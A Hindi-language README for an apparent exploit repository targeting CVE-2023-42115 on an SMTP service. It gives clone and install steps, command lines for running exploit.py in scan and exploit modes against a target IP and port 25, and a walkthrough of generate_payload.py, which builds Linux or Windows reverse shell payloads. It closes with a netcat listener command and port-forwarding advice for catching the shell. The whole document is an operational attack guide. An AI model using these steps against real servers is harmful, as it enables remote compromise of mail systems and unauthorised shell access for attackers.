
यह मॉड्यूल लक्ष्य सेवा में एक कमजोरी का शोषण करता है जिसे CVE-2023-42115 के रूप में पहचाना गया है।
इस रिपॉजिटरी में दो Python स्क्रिप्ट शामिल हैं:
exploit.py: CVE-2023-42115 के शोषण के लिए एक स्क्रिप्ट।generate_payload.py: रिवर्स शेल पेलोड जनरेट करने के लिए एक स्क्रिप्ट।स्क्रिप्ट चलाने से पहले, सुनिश्चित करें कि आपके सिस्टम पर Python 3 स्थापित है।
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/isotaka134/cve-2023-42115.git
cd cve-2023-42115
निर्भरताएँ स्थापित करें:
pip का उपयोग करके आवश्यक Python लाइब्रेरी स्थापित करें। requirements.txt में सूचीबद्ध सभी आवश्यक निर्भरताएँ स्थापित करने के लिए निम्नलिखित कमांड चलाएँ:
pip install -r requirements.txt
exploit.py
यह स्क्रिप्ट CVE-2023-42115 भेद्यता का शोषण करती है।
python exploit.py -t <target_ip> -p <target_port> [options]
विकल्प:
-t: लक्ष्य का IP पता।
-p: लक्ष्य सेवा का पोर्ट।
उदाहरण:
python exploit.py -t 192.168.1.10 -p 25 --mode SCAN
python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
generate_payload.py
यह स्क्रिप्ट उपयोगकर्ता इनपुट के आधार पर एक रिवर्स शेल पेलोड जनरेट करती है।
python generate_payload.py
चरण:
स्क्रिप्ट आपसे निम्नलिखित जानकारी माँगेगी:
A. पेलोड प्रकार (linux या windows)
B. स्थानीय IP पता: रिवर्स कनेक्शन के लिए
C. स्थानीय पोर्ट: रिवर्स कनेक्शन के लिए ** I: यदि आप राउटर के पीछे हैं या NAT का उपयोग कर रहे हैं, तो अपने Netcat चलाने वाले डिवाइस पर सही पोर्ट फ़ॉरवर्डिंग सेट करना सुनिश्चित करें।
D. आउटपुट फ़ाइल का नाम (जैसे, Linux के लिए payload.sh या Windows के लिए payload.ps1)
उदाहरण:
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh
आपको अपनी स्थानीय मशीन पर रिवर्स शेल पकड़ने के लिए एक लिसनर सेट करना होगा। इसके लिए आप Netcat (nc) का उपयोग कर सकते हैं।
nc -lvnp <YOUR_LOCAL_PORT>
nc -lvnp <YOUR_LOCAL_PORT>
इन चरणों का पालन करके, आपको CVE-2023-42115 का शोषण करने और एक रिवर्स शेल कनेक्शन प्राप्त करने के लिए पेलोड बनाने और उपयोग करने में सक्षम होना चाहिए।
यदि आपके पास सुधार के सुझाव हैं या योगदान देना चाहते हैं, तो कृपया एक issue खोलें या pull request सबमिट करें।
प्रश्नों या सहायता के लिए, कृपया संपर्क करें: